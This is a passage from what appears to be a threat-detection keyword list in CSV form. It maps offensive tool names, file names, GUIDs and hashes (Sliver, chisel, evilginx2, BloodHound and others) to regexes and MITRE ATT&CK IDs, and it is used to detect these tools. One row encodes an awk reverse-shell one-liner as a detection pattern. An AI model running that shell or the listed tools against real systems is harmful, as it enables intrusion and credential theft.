iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*awesome-cve-poc*",".{0,1000}awesome\-cve\-poc.{0,1000}","offensive_tool_keyword","POC","list of poc exploitation for known CVE","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/qazbnm456/awesome-cve-poc","1","1","N/A","N/A","10","3230","717","2022-01-04T19:07:43Z","2017-02-02T06:43:14Z" "*Awesome-Hacking*",".{0,1000}Awesome\-Hacking.{0,1000}","offensive_tool_keyword","Awesome-Hacking","A collection of awesome lists for hackers. pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","10","77481","8710","2024-04-13T12:39:36Z","2016-03-30T15:47:10Z" "*Awesome-Hacking-Resources*",".{0,1000}Awesome\-Hacking\-Resources.{0,1000}","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tools","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","10","14716","2077","2024-03-12T00:19:30Z","2017-10-10T19:09:18Z" "*awesome-osint*",".{0,1000}awesome\-osint.{0,1000}","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. 
publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","10","16497","2574","2024-04-27T10:16:53Z","2016-11-30T13:26:11Z" "*awesome-pentest*",".{0,1000}awesome\-pentest.{0,1000}","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","10","20539","4373","2024-04-28T22:51:39Z","2014-08-03T23:13:53Z" "*awesome-pentest-cheat-sheets*",".{0,1000}awesome\-pentest\-cheat\-sheets.{0,1000}","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tools","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","10","3736","764","2024-02-16T13:38:52Z","2016-11-29T00:00:18Z" "*awesome-scapy*",".{0,1000}awesome\-scapy.{0,1000}","offensive_tool_keyword","awesome-scapy","A Python tool and library for low level packet creation and manipulation","T1571 - T1596 - T1567 - T1569","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/secdev/awesome-scapy","1","1","N/A","N/A","2","196","30","2023-03-08T23:26:41Z","2020-02-04T12:17:35Z" "*awesome-static-analysis*",".{0,1000}awesome\-static\-analysis.{0,1000}","offensive_tool_keyword","awesome-static-analysis","This is a collection of static analysis tools and code quality checkers","T1064 - T1027 - T1029 - T1518","TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tools","https://github.com/codefactor-io/awesome-static-analysis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
"*awesome-web-security*",".{0,1000}awesome\-web\-security.{0,1000}","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Web Attacks","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","10","10835","1651","2024-02-22T00:28:07Z","2017-01-29T16:50:21Z" "*awesome-windows-domain-hardening*",".{0,1000}awesome\-windows\-domain\-hardening.{0,1000}","offensive_tool_keyword","awesome-windows-domain-hardening","A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools","T1563 - T1059 - T1547 - T1057 - T1574","TA0002 - TA0008 - TA0003 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/PaulSec/awesome-windows-domain-hardening","1","0","N/A","N/A","10","1708","267","2020-01-07T19:56:18Z","2017-02-19T19:20:38Z" "*awk 'BEGIN {s = ""/inet/tcp/0/*"";*printf ""shell>"" |& s;*getline*print $0 |& s;*close*}' /dev/null*",".{0,1000}awk\s\'BEGIN\s\{s\s\=\s\""\/inet\/tcp\/0\/.{0,1000}\""\;.{0,1000}printf\s\""shell\>\""\s\|\&\ss\;.{0,1000}getline.{0,1000}print\s\$0\s\|\&\ss\;.{0,1000}close.{0,1000}\}\'\s\/dev\/null.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*awk_reverse_tcp.py*",".{0,1000}awk_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*aws configure --profile exegol*",".{0,1000}aws\sconfigure\s\-\-profile\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*AWS_BUCKET=nemesis-test*",".{0,1000}AWS_BUCKET\=nemesis\-test.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*AWS_KMS_KEY_ALIAS=nemesis-dev*",".{0,1000}AWS_KMS_KEY_ALIAS\=nemesis\-dev.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*awsloot.py *",".{0,1000}awsloot\.py\s.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*axcrypt2john.py*",".{0,1000}axcrypt2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*aydinnyunus/PassDetective*",".{0,1000}aydinnyunus\/PassDetective.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*azfvgayqKwtFApcvyRedpUXculaeCCGA*",".{0,1000}azfvgayqKwtFApcvyRedpUXculaeCCGA.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*Azure-AccessPermissions.ps1*",".{0,1000}Azure\-AccessPermissions\.ps1.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","AD 
Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*Azure-AccessPermissions-master*",".{0,1000}Azure\-AccessPermissions\-master.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*AzureAD AutoLogon Brute*",".{0,1000}AzureAD\sAutoLogon\sBrute.{0,1000}","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","0","N/A","N/A","1","97","23","2024-02-21T20:22:50Z","2021-10-01T05:20:25Z" "*AzureAD_Autologon_Brute*",".{0,1000}AzureAD_Autologon_Brute.{0,1000}","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","1","N/A","N/A","1","97","23","2024-02-21T20:22:50Z","2021-10-01T05:20:25Z" "*azuread_decrypt_msol_*.ps1*",".{0,1000}azuread_decrypt_msol_.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","powershell","method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync","T1003.006","TA0006","N/A","N/A","Credential Access","https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*AzureADLateralMovement*",".{0,1000}AzureADLateralMovement.{0,1000}","offensive_tool_keyword","AzureADLateralMovement","AzureADLateralMovement allows to build Lateral Movement graph for Azure Active Directory entities - Users. Computers. Groups and Roles. 
Using the Microsoft Graph API AzureADLateralMovement extracts interesting information and builds json files containing Lateral Movement graph data compatible with Bloodhound 2.2.0","T1074 - T1075 - T1076","TA0008 - TA0009 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/talmaor/AzureADLateralMovement","1","1","N/A","N/A","2","117","23","2022-12-08T06:44:48Z","2019-06-22T06:13:28Z" "*AzureADRecon.ps1*",".{0,1000}AzureADRecon\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*AzureC2Relay.zip*",".{0,1000}AzureC2Relay\.zip.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*AzureC2Relay-main*",".{0,1000}AzureC2Relay\-main.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" 
"*AzureHound.ps1*",".{0,1000}AzureHound\.ps1.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*azurehound/v2*",".{0,1000}azurehound\/v2.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*-b bleeding-jumbo*",".{0,1000}\-b\sbleeding\-jumbo.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*'B','e','a','c','o','n'*",".{0,1000}\'B\',\'e\',\'a\',\'c\',\'o\',\'n\'.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*B03A3AF9-9448-43FE-8CEE-5A2C43BFAC86*",".{0,1000}B03A3AF9\-9448\-43FE\-8CEE\-5A2C43BFAC86.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*b051d7e7069a4ec95d14811b1feb6813bb750fd281080ea0e6941ba1119180fb*",".{0,1000}b051d7e7069a4ec95d14811b1feb6813bb750fd281080ea0e6941ba1119180fb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b0580360a94eff032f2113013124fb7209eb9bfef654841aeac2ebc09cec15c8*",".{0,1000}b0580360a94eff032f2113013124fb7209eb9bfef654841aeac2ebc09cec15c8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b08782b58eb043e7cd649302ceea993582f55762d7b384c418253d227930fe32*",".{0,1000}b08782b58eb043e7cd649302ceea993582f55762d7b384c418253d227930fe32.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*b0a55532654bbfd0aafa59dfe26b576a095d9ac4a4af2f99bca442a1d87ce29b*",".{0,1000}b0a55532654bbfd0aafa59dfe26b576a095d9ac4a4af2f99bca442a1d87ce29b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b0c674b496620842bae84b3e11231c4913ba57e9c4aa9458e670c153a66be810*",".{0,1000}b0c674b496620842bae84b3e11231c4913ba57e9c4aa9458e670c153a66be810.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*b0d2dbeadcaced10cbffe3bffe6419e8f64ed772ae68698db3d03d03ee5f92eb*",".{0,1000}b0d2dbeadcaced10cbffe3bffe6419e8f64ed772ae68698db3d03d03ee5f92eb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b0ef1323e8a932c4ce1ff333d0ddf165c87997f07be51453adec35360feeb451*",".{0,1000}b0ef1323e8a932c4ce1ff333d0ddf165c87997f07be51453adec35360feeb451.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over 
HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b0f47f0f3ef0ac238b9c52ca4bfee5f017f0531625f1ad8454bbb3c35e577453*",".{0,1000}b0f47f0f3ef0ac238b9c52ca4bfee5f017f0531625f1ad8454bbb3c35e577453.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3*",".{0,1000}B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3*",".{0,1000}B11F13DC6E6546E134FE8F836C13CCBBD1D8E5120FBD2B40A81E66DFD7C4EBC3.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*b18aca1b9e2a9e72cb77960c355d288b*",".{0,1000}b18aca1b9e2a9e72cb77960c355d288b.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*b18d778b4e4b6bf1fd5b2d790c941270145a6a6d*",".{0,1000}b18d778b4e4b6bf1fd5b2d790c941270145a6a6d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*b19a46f99b649dc731ed5c8410bda7e0385d15e1b9aab1e467b05dccd7753865*",".{0,1000}b19a46f99b649dc731ed5c8410bda7e0385d15e1b9aab1e467b05dccd7753865.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*b1ba3cccf93baf069e6502bc75d033bcb519fd7209be70eec7f0743db81b6650*",".{0,1000}b1ba3cccf93baf069e6502bc75d033bcb519fd7209be70eec7f0743db81b6650.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*b1c9f86c2715b984749012eb27fc0b1c9e9ae5b92a43991d4ee57bcf54d35daa*",".{0,1000}b1c9f86c2715b984749012eb27fc0b1c9e9ae5b92a43991d4ee57bcf54d35daa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*B1CB9A30-FEA6-4467-BEC5-4803CCE9BF78*",".{0,1000}B1CB9A30\-FEA6\-4467\-BEC5\-4803CCE9BF78.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*b1d9a3c0bd0e7b091ac0dd51fc64ea57f119146fb767a83547b8e95ef2ae5f67*",".{0,1000}b1d9a3c0bd0e7b091ac0dd51fc64ea57f119146fb767a83547b8e95ef2ae5f67.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b1f74fb000e49de96f3033358eda1093459f2ea51d2dfbeddb10702af6037a1e*",".{0,1000}b1f74fb000e49de96f3033358eda1093459f2ea51d2dfbeddb10702af6037a1e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - 
T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b1fd8a78d51a7dfbb73cf0f92912dc4363a2b5bd6746a792b63ac3ae1afb9ccd*",".{0,1000}b1fd8a78d51a7dfbb73cf0f92912dc4363a2b5bd6746a792b63ac3ae1afb9ccd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b206d36ab4eb52419e27ca315cc9151e86eb31513ab6aa28fe8879141ef746bb*",".{0,1000}b206d36ab4eb52419e27ca315cc9151e86eb31513ab6aa28fe8879141ef746bb.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*b22e1828fa279346364b3915e2182b42141a093fe053c43c4ae024061156a401*",".{0,1000}b22e1828fa279346364b3915e2182b42141a093fe053c43c4ae024061156a401.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier 
